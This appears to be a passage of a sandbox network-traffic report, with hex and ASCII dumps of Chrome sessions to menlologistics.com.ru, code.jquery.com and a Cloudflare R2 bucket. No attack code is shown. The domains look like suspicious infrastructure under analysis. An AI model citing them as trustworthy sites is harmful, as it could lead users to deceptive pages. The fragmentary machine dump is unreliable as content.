                                                    2024-07-04 19:06:04 UTC1369INData Raw: 2d 6d 6f 64 65 3a 20 6d 75 6c 74 69 70 6c 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 30 37 34 20 31 34 32 2e 38 33 31 43 31 30 33 2e 30 33 38 20 31 34 35 2e 33 39 35 20 31 30 34 2e 30 32 31 20 31 34 37 2e 38 36 39 20 31 30 35 2e 38 30 38 20 31 34 39 2e 37 30 39 43 31 30 37 2e 35 39 35 20 31 35 31 2e 35 34 39 20 31 31 30 2e 30 33 39 20 31 35 32 2e 36 30 33 20 31 31 32 2e 36 30 34 20 31 35 32 2e 36 34 31 43 31 31 35 2e 31 36 38 20 31 35 32 2e 36 30 33 20 31 31 37 2e 36 31 33 20 31 35 31 2e 35 34 39 20 31 31 39 2e 34 20 31 34 39 2e 37 30 39 43 31 32 31 2e 31 38 37 20 31 34 37 2e 38 36 39 20 31 32 32 2e 31 37 20 31 34 35 2e 33 39 35 20 31 32 32 2e 31 33 34 20 31 34 32 2e
                                                    Data Ascii: -mode: multiply"> <path d="M103.074 142.831C103.038 145.395 104.021 147.869 105.808 149.709C107.595 151.549 110.039 152.603 112.604 152.641C115.168 152.603 117.613 151.549 119.4 149.709C121.187 147.869 122.17 145.395 122.134 142.
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 38 37 2e 30 31 34 31 48 31 34 32 2e 31 37 37 56 39 31 2e 31 30 38 39 48 31 33 37 2e 30 38 37 56 38 37 2e 30 31 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 38 37 2e 30 31 34 31 48 31 33 34 2e 39 33 34 56 39 31 2e 31 30 38 39 48 31 32 39 2e 38 35 32 56 38 37 2e 30 31 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20
                                                    Data Ascii: fill="#0055DC" /> <path d="M137.087 87.0141H142.177V91.1089H137.087V87.0141Z" fill="#0055DC" /> <path d="M129.852 87.0141H134.934V91.1089H129.852V87.0141Z"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.449762188.114.97.34432124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:06:03 UTC346OUTGET // HTTP/1.1
                                                    Host: menlologistics.com.ru
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-07-04 19:06:04 UTC635INHTTP/1.1 200 OK
                                                    Date: Thu, 04 Jul 2024 19:06:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B05aGSQCq5TgPdQwgORVSMvYyGx87Vkl%2FgrgOiybBV0rmOxdde4Btlvk8qxnvXPIxLQg9o8MuQGQT0ubnFOC1usIJVp0AOFLF2n2oB1H69xnGDq6slLR7tQy%2FyoU1bq7NKduWsGBBDs%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89e163ee0a680f36-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-04 19:06:04 UTC734INData Raw: 31 62 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 75 6e 65 72 20 43 61 72 20 43 6f 6d 6d 75 6e 69 74 79 20 2d 20 6d 65 6e 6c 6f 6c 6f 67 69 73 74 69 63 73 2e 63 6f 6d 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e
                                                    Data Ascii: 1bf9<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Tuner Car Community - menlologistics.com.ru</title> <link href="https://cdn.jsdelivr.n
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 34 33 61 34 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69
                                                    Data Ascii: cover; color: white; padding: 150px 0; text-align: center; } .content-section { padding: 60px 0; } .footer { background: #343a40; color: whi
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 6e 6c 6f 6c 6f 67 69 73 74 69 63 73 2e 63 6f 6d 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 6e 6c 6f 6c 6f 67 69 73 74 69 63 73 2e 63 6f 6d 2e 72 75 2f 23 73 65 72 76 69 63 65 73 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 0d 0a 20 20 20
                                                    Data Ascii: <a class="nav-link" href="https://menlologistics.com.ru/#about">About</a> </li> <li class="nav-item"> <a class="nav-link" href="https://menlologistics.com.ru/#services">Services</a>
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 6d 61 69 6c 3d 22 65 38 38 62 38 37 38 36 39 63 38 39 38 62 39 63 61 38 38 35 38 64 38 36 38 34 38 37 38 34 38 37 38 66 38 31 39 62 39 63 38 31 38 62 39 62 63 36 38 62 38 37 38 35 63 36 39 61 39 64 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 37 37 37 2d 34 35 39 2d 32 38 37 35 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 48 61 76 65 20 79 6f 75 20 65 76 65 72 20 6e 6f 74 69 63 65 64 20 74 68 61 74 20 61 6e 79 62 6f 64 79 20
                                                    Data Ascii: mail="e88b87869c898b9ca8858d86848784878f819b9c818b9bc68b8785c69a9d">[email&#160;protected]</span></a> or call us at 777-459-2875.</p> <blockquote class="blockquote"> <p class="mb-0">Have you ever noticed that anybody
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 65 72 69 65 6e 63 65 66 65 72 72 61 72 69 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 34 2f 31 39 36 38 2d 44 6f 64 67 65 2d 43 68 61 72 67 65 72 2d 52 54 2e 6a 70 67 22 20 61 6c 74 3d 22 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 62 6f 64 79 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 22 3e 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74
                                                    Data Ascii: erienceferrari.com/wp-content/uploads/2024/04/1968-Dodge-Charger-RT.jpg" alt="Modern Supercar"> <div class="card-body"> <h5 class="card-title">Modern Supercars</h5> <p class="card-text
                                                    2024-07-04 19:06:04 UTC959INData Raw: 2e 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 72 65 74 72 6f 2d 74 65 78 74 22 3e 45 73 74 61 62 6c 69 73 68 65 64 20 69 6e 20 31 39 35 32 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 6e 6c 6f 6c 6f 67 69 73 74 69 63 73 2e 63 6f 6d 2e 72 75 2f 23 70 72 69 76 61 63 79 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e
                                                    Data Ascii: . All Rights Reserved.</p> <p class="retro-text">Established in 1952</p> <ul class="list-inline"> <li class="list-inline-item"> <a href="https://menlologistics.com.ru/#privacy">Privacy</a> </li>
                                                    2024-07-04 19:06:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.449761151.101.66.1374432124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:06:03 UTC649OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                    Host: code.jquery.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-07-04 19:06:04 UTC560INHTTP/1.1 200 OK
                                                    Connection: close
                                                    Content-Length: 89501
                                                    Server: nginx
                                                    Content-Type: application/javascript; charset=utf-8
                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                    ETag: "28feccc0-15d9d"
                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                    Access-Control-Allow-Origin: *
                                                    Via: 1.1 varnish, 1.1 varnish
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 04 Jul 2024 19:06:03 GMT
                                                    Age: 1524535
                                                    X-Served-By: cache-lga21931-LGA, cache-ewr18162-EWR
                                                    X-Cache: HIT, HIT
                                                    X-Cache-Hits: 55, 2
                                                    X-Timer: S1720119964.834739,VS0,VE0
                                                    Vary: Accept-Encoding
                                                    2024-07-04 19:06:04 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                    2024-07-04 19:06:04 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                    2024-07-04 19:06:04 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                    2024-07-04 19:06:04 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.449763104.18.2.354432124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:06:04 UTC641OUTGET /, HTTP/1.1
                                                    Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.dev
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-07-04 19:06:04 UTC180INHTTP/1.1 404 Not Found
                                                    Date: Thu, 04 Jul 2024 19:06:04 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 27150
                                                    Connection: close
                                                    Server: cloudflare
                                                    CF-RAY: 89e163f34d79c327-EWR
                                                    2024-07-04 19:06:04 UTC1189INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 32 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 25 2c 0a 20 20 20 20 20 20 20 20 35 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20
                                                    Data Ascii: 2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px);
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 50 75 62 6c 69 63 20 41 63 63 65 73 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74
                                                    Data Ascii: p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <sect
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 43 31 32 31 2e 30 35 33 20 31 33 2e 32 37 37 20 31 31 38 2e 32 30 34 20 31 30 2e 34 32 38 38 20 31 31 38 2e 32 30 34 20 36 2e 39 31 35 33 34 43 31 31 38 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30 31 39 31 20 31 33 30 2e 39 32 38 20 36 2e 39 31 35 33 34 43 31 33 30 2e 39 32 38 20 31 30 2e 34 32 38 38 20 31 32 38 2e 30 38 20 31 33 2e 32 37 37 20 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43
                                                    Data Ascii: <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40191 130.928 6.91534C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 33 30 34 20 39 39 2e 36 31 34 39 43 37 33 2e 31 38 38 38 20 31 30 30 2e 38 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 48 37 35 2e 35 34 35 39 43 37 35 2e 35 34 35 39 20 31 30 38 2e 31 39 35 20 37 38 2e 33 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 43 31
                                                    Data Ascii: 304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406Z" fill="#0055DC" /> <path d="M136.176 111.953C1
